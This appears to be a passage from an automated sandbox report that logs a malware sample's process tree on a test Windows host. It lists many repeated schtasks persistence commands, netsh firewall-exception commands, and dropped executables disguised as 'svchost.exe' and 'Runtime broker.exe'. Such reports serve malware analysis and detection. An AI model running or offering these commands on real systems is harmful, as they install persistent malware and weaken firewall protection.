        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        71⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7elBgAg9DEVh.bat" "
        71⤵
        
        PID:6364
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        72⤵
        
        PID:1092
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        72⤵
        
        PID:3960
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        72⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6748
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        72⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        73⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kFoKEI9Magqf.bat" "
        73⤵
        
        PID:4660
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        74⤵
        
        PID:5284
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        74⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5052
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        74⤵
        
        PID:5296
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        75⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5488
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EI6ARkfrEZtu.bat" "
        75⤵
        
        PID:5832
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        76⤵
        
        PID:1568
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        76⤵
        
        PID:6672
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        76⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6052
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        76⤵
        
        PID:196
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        77⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UvTHVPdYy3cl.bat" "
        77⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        78⤵
        
        PID:5588
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        78⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1164
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        78⤵
        
        PID:6572
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        79⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1300
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A4Qkiw3bSMVC.bat" "
        79⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        80⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        80⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7004
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        80⤵
        
        PID:6436
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        81⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B8O6qQkxSeYY.bat" "
        81⤵
        
        PID:1940
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        82⤵
        
        PID:6416
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        82⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2692
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        82⤵
        
        PID:6260
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        83⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pmClHlYvF0Y4.bat" "
        83⤵
        
        PID:5368
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        84⤵
        
        PID:2656
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        84⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2756
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        84⤵
        
        PID:5372
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        85⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5696
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YKi8aWBNPCtZ.bat" "
        85⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        86⤵
        
        PID:1416
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        86⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5460
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        86⤵
        
        PID:6092
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        87⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qio30YDAncWK.bat" "
        87⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        88⤵
        
        PID:460
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        88⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6652
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe"
        88⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Client.exe" /rl HIGHEST /f
        89⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2296
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GQ22HZu5rjNU.bat" "
        89⤵
        
        PID:3368
    - - C:\Users\Admin\AppData\Local\Temp\Files\MajesticExec.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\MajesticExec.exe"
        5⤵
        Executes dropped EXE
        
        PID:2380
    - - C:\Users\Admin\AppData\Local\Temp\Files\cdb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\cdb.exe"
        5⤵
        Executes dropped EXE
        
        PID:1228
    - - C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3804
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Runtime broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1164
      - C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3092
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Runtime broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe" /rl HIGHEST /f
        7⤵
        
        PID:4644
    - - C:\Users\Admin\AppData\Local\Temp\Files\SGVP%20Client%20Users.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\SGVP%20Client%20Users.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4904
    - - C:\Users\Admin\AppData\Local\Temp\Files\jgesfyhjsefa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\jgesfyhjsefa.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4272
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\jgesfyhjsefa.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3268
    - - C:\Users\Admin\AppData\Local\Temp\Files\newest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\newest.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3476
      - C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Drops autorun.inf file
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1144
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        7⤵
        
        PID:1992
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3488
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        7⤵
        
        PID:1600
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        7⤵
        Executes dropped EXE
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        8⤵
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3776
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        9⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1824
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        9⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        9⤵
        Modifies Windows Firewall
        
        PID:2488
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        9⤵
        Executes dropped EXE
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        10⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:5052
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        11⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4456
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        11⤵
        Modifies Windows Firewall
        
        PID:4536
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:4500
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        11⤵
        Executes dropped EXE
        
        PID:576
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        12⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2016
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        13⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2676
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        13⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4084
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:3328
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        13⤵
        Executes dropped EXE
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        14⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        15⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4736
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        15⤵
        Modifies Windows Firewall
        
        PID:2920
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        15⤵
        
        PID:4308
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        15⤵
        Executes dropped EXE
        
        PID:1292
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        16⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2284
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        17⤵
        Modifies Windows Firewall
        
        PID:1992
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        17⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4900
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        17⤵
        
        PID:1676
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        17⤵
        Executes dropped EXE
        
        PID:256
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        18⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3188
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        19⤵
        Modifies Windows Firewall
        
        PID:4792
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        19⤵
        Modifies Windows Firewall
        System Location Discovery: System Language Discovery
        
        PID:2692
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        19⤵
        
        PID:1388
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        19⤵
        Executes dropped EXE
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        20⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4696
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        21⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1400
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        21⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1184
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        21⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:860
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        21⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        22⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1996
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        23⤵
        
        PID:3688
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        23⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3356
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        23⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        23⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        24⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        25⤵
        
        PID:4804
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        25⤵
        Modifies Windows Firewall
        
        PID:2300
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        25⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        25⤵
        Executes dropped EXE
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        26⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        27⤵
        System Location Discovery: System Language Discovery
        
        PID:4720
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        27⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4804
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        27⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        27⤵
        Executes dropped EXE
        
        PID:1524
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        28⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3468
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        29⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4104
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        29⤵
        
        PID:1228
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        29⤵
        
        PID:1996
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        29⤵
        Executes dropped EXE
        
        PID:1156
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        30⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1676
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        31⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3424
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        31⤵
        Modifies Windows Firewall
        
        PID:4100
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        31⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1524
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        31⤵
        Executes dropped EXE
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        32⤵
        Drops startup file
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3584
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        33⤵
        
        PID:2380
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        33⤵
        
        PID:1536
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        33⤵
        
        PID:488
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        33⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        34⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        35⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3200
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        35⤵
        Modifies Windows Firewall
        
        PID:4980
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        35⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        35⤵
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        36⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3980
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        37⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        37⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4340
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        37⤵
        
        PID:1232
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        37⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        38⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3740
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        39⤵
        
        PID:3356
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        39⤵
        
        PID:3100
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        39⤵
